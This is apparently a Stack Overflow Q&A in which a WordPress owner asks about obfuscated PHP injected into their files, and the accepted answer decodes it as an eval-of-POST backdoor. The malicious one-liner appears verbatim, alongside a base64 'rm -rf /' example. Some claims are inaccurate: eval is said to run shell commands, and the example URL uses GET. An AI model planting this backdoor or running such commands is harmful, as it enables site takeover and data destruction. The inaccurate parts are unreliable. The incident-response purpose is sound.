# Unusual Code in almost each WordPress PHP File

Tags: php, wordpress, security

Can any one explain this code. I am having this code on the top of almost every php file. What is this code for. Thanks for your help.

Here is the code....

```
<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n642afe'])) {eval($s21(${$s20}['n642afe']));} ?>
```

Comment: Additionally, change your ftp/ssh password to the server immediately. Check any other websites you maintain, the exploit may have originated on your pc.

Comment: As @curtis1000 said, it'd be a good way to go about it. If you're using FTP to transfer stuff - I'd recommend also looking into SSH instead, killing ALL FTP access to the server and ensuring your machine is clean.

Answer (score 1, accepted):

I've seen that code a number of times in different incarnations. It's a piece of injected code left by an attacker. If you break it down it almost always results in `eval($var);` where `$var` is an injected parameter (usually `$_POST`) that then is used to perform some sort of malicious act on your server. Bear in mind `eval()` will execute any linux command with the **same permissions** and **authority** of the user running Apache/PHP.

### Breaking down your example

In your example you've given the following code:

```
<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n642afe'])) {eval($s21(${$s20}['n642afe']));} ?>
```

This is semi-obfuscated code but let's start to work through it. The first thing we need to do here is format it to start to understand it:

```
<?php 
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);
if (isset(${$s20}['n642afe'])) {
    eval($s21(${$s20}['n642afe']));
} 
?>
```

We can see now that this is a relatively simple PHP script.

**Line 1:**

`$sF="PCT4BA6ODSE_";` is just a variable with what seems like random rubbish in it.

**Line 2:**

```
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
```

This can be translated into: `$s21 = "base64_decode"`

**Line 3:**

```
$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);
```

As above, running `strtoupper()` on that string produces the result `_POST`.

**Line 4:**

The if statement here checks to see if `${s20}['n642afe']` is set. Well we know that `$s20` evaluates to `_POST` and `${}` type variables take the value as their variable name so this is really:

`if(isset($_POST['n642afe'])){`

*Note*: The `n642afe` part is a random parameter they've chosen so that you (or any other attacker!!!) tries to go to `somefile.php?hack=yes` it wouldn't work

**Line 5:**

The most dangerous part is here. Let's evaluate our variables in the same manner as above:

```
eval($s21(${$s20}['n642afe']));
```

### The end result

```
eval(base64_decode($_POST['n642afe']));
```

If I were to send `rm -rf /` base64 encoded as post value for the parameter `n642afe` that would recursively delete everything. Unlikely it'd be able to do that without super user permissions but the point is - they'd have the same access rights as you do when you SSH to your server. Here's an example of what that'd look like:

```
http://example.com/infected.php?n642afe=cm0gLXJmIC8=
```

Translated, this becomes:

```
eval(base64_decode('cm0gLXJmIC8='));
```

And then again:

```
eval('rm -rf /');
```

My recommendation is - take the site offline **immediately**, update it, patch any
holes that are obvious and then make sure your server (and any other sites on there) are secure. Pay particular attention to file and folder permissions on your server. Note: this is a non-exhaustive list, there's so much more you can do to protect yourself.

If you simply delete this line you'll probably find one of two things will happen (or both):

1. The permissions on the "infected" file are different and the file is owned by a different user. You'll need to chmod/chown the file to get it back
2. The attackers **will** keep trying to get back in once they've been successful once. Simply removing the bad code is a good start but ask yourself this: "How did they get in in the first place?". With that in mind, please refer to my recommendation paragraph to begin to solve your issue.

### Finding how they got in

To find where attackers 'got in' could be a game of cat and mouse, it's worth starting with the apache access logs though and searching for requests to your infected file with the parameter `n642afe`. You could also check your PHP logs to see what exactly was run and see what other holes they've opened.

Comment: Can i remove this code one by one from each of my files. Will it be possible to block the attacker??
Thanks

Comment: If you remove the code, that'll stop the attack but it **will not** stop how they got the code in there in the first place

Comment: Thanks for your reply you have explained each and every line of code in detail. Can you tell me how to check where the attacker got in there because my website seems to be secured i don't see any loop holes where he can put this code inside - ScottMc Gready

Comment: Good stuff. If you feel my post has answered your question, feel free to mark it as so. I've updated it with advice for where to check.